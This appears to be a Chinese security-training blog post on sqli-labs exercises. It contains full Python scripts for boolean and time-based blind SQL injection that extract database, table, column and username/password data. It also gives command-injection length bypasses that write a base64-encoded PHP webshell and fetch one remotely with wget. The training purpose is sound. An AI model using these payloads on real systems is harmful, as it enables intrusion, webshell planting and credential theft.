【网络安全4x03】洞明科技网络安全培训 --- day3

发表于 更新于

第三天补充了几个sql注入知识点,讲了一些命令执行的绕过方法。

sql注入补充

报错注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
# -*- coding: utf-8 -*-  
import requests
db = ''
table =''
list1 = []
column = ''
flag = ''
url = 'http://192.168.0.126:8004/Less-5/?id='
code = 'You are in'
#check_data = list('1234567890abcdefghijklmnopqrstuvwxyz@\{\}_')

headers = {
    'user-agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'
}

# 爆当前库长度
for i in range(0,20):
	pay1 = "1'and (length(database()))>%s --+" %i
	re1 = requests.get(url+pay1,headers=headers,timeout=60)
	if re1.content.find(code) == -1:
		print (i)
		break

# 爆当前库名
# for a in range(1,9):
# 	for j in range(1, 128):
# 		pay2 = "1'and ascii(substr((select database()),%s,1))=%s --+" %(a,j)
# 		re2 = requests.get(url+pay2,headers=headers,timeout=60)
# 		if re2.content.find(code) != -1:
# 			db = db + chr(j)
# 			print (a,db)

# 爆表名(limit)
# for j in range(0,5):
# 	for n in range(1,10):
# 		for i in range(1,128):
# 			pay3 = "1'\
# 			and ascii(substr((select table_name from information_schema.tables\
# 			 where table_schema=database() limit %s,1),%s,1))=%s --+" %(j,n,i)
# 			re3 = requests.get(url+pay3,headers=headers,timeout=60)
# 			#print url3
# 			if re3.content.find(code) != -1:
# 				table = table + chr(i)
# 				print(j,table)

# 爆表名(group_concat)
# for n in range(1,50):
# 	for i in range(1,128):
# 		pay3 = "1'\
# 		and ascii(substr((select group_concat(table_name) from information_schema.tables\
# 		 where table_schema=database()),%s,1))=%s --+" %(n,i)
# 		re3 = requests.get(url+pay3,headers=headers,timeout=60)
# 		#print url3
# 		if re3.content.find(code) != -1:
# 			table = table + chr(i)
# 			print (n,table)

# 爆列名(limit)
# for a in range(0,5):
# 	for b in xrange(1,20):
# 		for c in range(1,128):
# 			pay4 = "1' \
# 			and ascii(substr((select column_name from information_schema.columns \
# 			where table_name='users' limit %s,1),%s,1))=%s --+" %(a,b,c)
# 			re4 = requests.get(url+pay4,headers=headers,timeout=60)
# 			if re4.content.find(code) != -1:
# 				column = column+chr(c)
# 				print (a,column)

# 爆列名(group_concat)
# for b in xrange(1,50):
# 	for c in range(1,128):
# 		pay4 = "1' \
# 		and ascii(substr((select group_concat(column_name) from information_schema.columns \
# 		where table_name='users'),%s,1))=%s --+" %(b,c)
# 		re4 = requests.get(url+pay4,headers=headers,timeout=60)
# 		if re4.content.find(code) != -1:
# 			column = column+chr(c)
# 			print (b,column)

# 爆数据
# for b in xrange(1,100):
# 	for c in range(1,128):
# 		pay5 = "1' \
# 		and ascii(substr((select group_concat(username,' ',password) from users),%s,1))=%s --+" %(b,c)
# 		re5 = requests.get(url+pay5,headers=headers,timeout=60)
# 		if re5.content.find(code) != -1:
# 			flag = flag+chr(c)
# 			print (b,flag)

时间盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
# -*- coding: utf-8 -*-  
import requests
import datetime
db = ''
table =''
list1 = []
column = ''
flag = ''
url = 'http://192.168.0.126:8004/Less-9/?id='
code = 'You are in'
names = '1234567890abcdefghijklmnopqrstuvwxyz@!@#$%^&*()-=`~[];,._+|:<>?'

headers = {
    'user-agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'
}

# 爆当前库长度
for i in range(1,20):
	pay1 = "1' and if(length(database())>%d,1,sleep(2)) --+" %i
	time1 = datetime.datetime.now()
	re1 = requests.get(url+pay1)
	time2 = datetime.datetime.now()
	sec = (time2 - time1).seconds
	if sec >= 2:
		print ('length',i)
		break

# 爆当前库名
# for a in range(1,9):
# 	for j in range(1,128):
# 		pay2 = "1' and if(ascii(substr((select database()),%d,1))=%d,sleep(2),1) --+" %(a,j)
# 		time1 = datetime.datetime.now()
# 		re2 = requests.get(url+pay2)
# 		time2 = datetime.datetime.now()
# 		sec = (time2 - time1).seconds
# 		if sec >= 2:
# 			db += chr(j)
# 			print(a,db)

# 爆表名(limit)
# for j in range(0,5):
# 	for n in range(1,10):
# 		for i in range(1,128):
# 			pay3 = "1'\
# 			and if(ascii(substr((select table_name from information_schema.tables\
# 			 where table_schema=database() limit %d,1),%d,1))=%d,sleep(2),1) --+" %(j,n,i)
# 			time1 = datetime.datetime.now()
# 			re3 = requests.get(url+pay3)
# 			time2 = datetime.datetime.now()
# 			sec = (time2 - time1).seconds
# 			if sec >= 2:
# 				table = table + chr(i)
# 				print(j,table)

# 爆表名(group_concat)
# for n in range(1,50):
# 	for i in range(1,128):
# 		pay3 = "1'\
# 		and if(ascii(substr((select group_concat(table_name) from information_schema.tables\
# 		 where table_schema=database()),%d,1))=%d,sleep(2),1) --+" %(n,i)
# 		time1 = datetime.datetime.now()
# 		re3 = requests.get(url+pay3)
# 		time2 = datetime.datetime.now()
# 		sec = (time2 - time1).seconds
# 		if sec >= 2:
# 			table = table + chr(i)
# 			print(n,table)

# 爆列名(limit)
# for a in range(0,5):
# 	for b in xrange(1,20):
# 		for c in range(1,128):
# 			pay4 = "1' \
# 			and if(ascii(substr((select column_name from information_schema.columns \
# 			where table_name='users' limit %d,1),%d,1))=%d,sleep(2),1) --+" %(a,b,c)
# 			time1 = datetime.datetime.now()
# 			re4 = requests.get(url+pay4)
# 			time2 = datetime.datetime.now()
# 			sec = (time2 - time1).seconds
# 			if sec >= 2:
# 				column = column+chr(c)
# 				print (a,column)

# 爆列名(group_concat)
# for b in xrange(1,50):
# 	for c in range(1,128):
# 		pay4 = "1' \
# 		and if(ascii(substr((select group_concat(column_name) from information_schema.columns \
# 		where table_name='users'),%d,1))=%d,sleep(2),1) --+" %(b,c)
# 		time1 = datetime.datetime.now()
# 		re4 = requests.get(url+pay4)
# 		time2 = datetime.datetime.now()
# 		sec = (time2 - time1).seconds
# 		if sec >= 2:
# 			column = column+chr(c)
# 			print (b,column)

# 爆数据
# for b in xrange(1,300):
# 	for c in range(1,128):
# 		pay5 = "1' \
# 		and if(ascii(substr((select group_concat(username,' ',password) from users),%d,1))=%d,sleep(2),1) --+" %(b,c)
# 		time1 = datetime.datetime.now()
# 		re5 = requests.get(url+pay5)
# 		time2 = datetime.datetime.now()
# 		sec = (time2 - time1).seconds
# 		if sec >= 2:
# 			flag = flag+chr(c)
# 			print (b,flag)

二次注入

sqli-labs第27关

通过注册用户提交数据给数据库,再点击查看数据从数据库里取出数据显示出来。如果第一步存数据没有做到足够过滤,第二步的显示则存在注入漏洞。

首先测试正常名字,显示正常。再尝试单引号闭合后面加个sleep,发现不再显示且有延迟。之后union查询即可。

命令注入

限制命令长度<8

方法1

cat*匹配:

1
2
?cmd=>cat
?cmd=* ../*

方法2

base64加密一句话木马:

1
2
<?php eval($_POST[1]);
PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==

要传入的命令即:

1
echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==|base64 -d>1.php

然后分段传入,注意特殊字符要加转义符。最后执行ls -t>0,即按创建逆序依次写入文件0中,最后sh 0即可在同级目录下建好一句话木马文件1.php

payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
>hp
>1.p\\
>d\>\\
>\ -\\
>e64\\
>bas\\
>\|\\
>==\\
>pOw\\
>MV0\\
>1Rb\\
>BPU\\
>kX1\\
>bCg\\
>XZh\\
>AgZ\\
>waH\\
>PD9\\
>o\ \\
>ech\\
ls -t>0
sh 0

方法3

与方法2类似,不过一句话木马不再echo写入,而是通过wget远程获取本机写好的木马。

payload:

1
2
3
4
5
6
7
8
9
10
?1=>hp
?1=>ell.p\\
?1=>\ sh\\
?1=>\ -O\\
?1=>com\\
?1=>x.\\
?1=>\ xx\\
?1=>wget\\
?1=ls -t>a
?1=sh a